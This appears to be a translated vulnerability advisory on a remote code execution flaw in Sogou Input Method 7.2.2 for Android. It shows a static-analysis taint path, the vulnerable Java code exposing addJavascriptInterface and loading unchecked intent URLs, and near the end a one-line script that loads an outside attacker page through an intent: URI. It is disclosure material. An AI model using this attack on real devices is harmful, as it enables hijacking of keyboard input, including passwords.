Sogou Input Method remote code execution can maliciously hijack user input

Sogou Input Method remote code execution can maliciously hijack user input

The sogou input method is used for remote code execution. All the content entered by the user, including the password, can be viewed at a glance.

The latest version of sogou input method (7.2.2) does not properly handle intent input parameters and is directly introduced into jsinterface, resulting in code execution. At the same time, all Android devices <= 4.4.2 are affected because the targetSDK of sogou input method is too low.


0x01:

JADE static detection finds the following taint path:

Taint source:$r3 = virtualinvoke $r0.<sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity: android.content.Intent getIntent()>() on line 107 in method <sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity: void onCreate(android.os.Bundle)>Taint path:$r3 = virtualinvoke $r2.<java.lang.String: android.content.Intent getDataString()>() on line 112 in method <sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity: void processExtraData(android.content.Intent)>Taint sink:$r2.<com.tencent.smtt.sdk.WebView$SystemWebView: void loadUrl(java.lang.String)>($r1) on line 780 in method <com.tencent.smtt.sdk.WebView: void loadUrl(java.lang.String)>

Call relationship diagram: onCreate-> processExtraData-> loadUrl



This can cause problems such as phishing and cross-domain file Reading. However, there are more serious problems.



0x02: static detection also found that the mini-webviewactivity uses addJavascriptInterface, And the targetSDK of this APK is 7 (Android 2.1 ), as a result, the addjsinterface vulnerability has extended its impact to all Android devices using webview, that is, <= 4.4.2. According to umeng, 95% of Android devices in China are included.



Because of the key position of the input method application, it controls all the input content of the user. After controlling the input process, the input of all users, including passwords and ID cards, is undoubtedly exposed.

@SuppressLint(value={"SetJavaScriptEnabled"}) private void initWebView() {        LogUtil.i("Mini WebView", "-------- init webview -------"); /*omit*/        this.mWebView.addJavascriptInterface(new ContextShareInterface(), "sogoumse_interface");        this.mWebView.requestFocus();

Use intent scheme to expand this issue to Remote Code Execution

Problem code:
 

private void processExtraData(Intent arg3) {        if(arg3 != null && ("android.intent.action.VIEW".equals(arg3.getAction())) && arg3.getData()                 != null) {            this.recreateWebView();            this.mWebView.loadUrl(arg3.getDataString());        }    }

Code execution example: Write a file into the sdcard
 

4.3 still affected
 

 

Remote attack code:

<Script>

Location. href = "intent: http://myqsc.sinaapp.com/fuck.html#Intent;SEL;component=com.sohu.inputmethod.sogou/sogou.mobile.explorer.hotwords.minibrowser.MiniWebViewActivity;end ";

</Script>

Solution:

Process incoming URLs and update targetSDK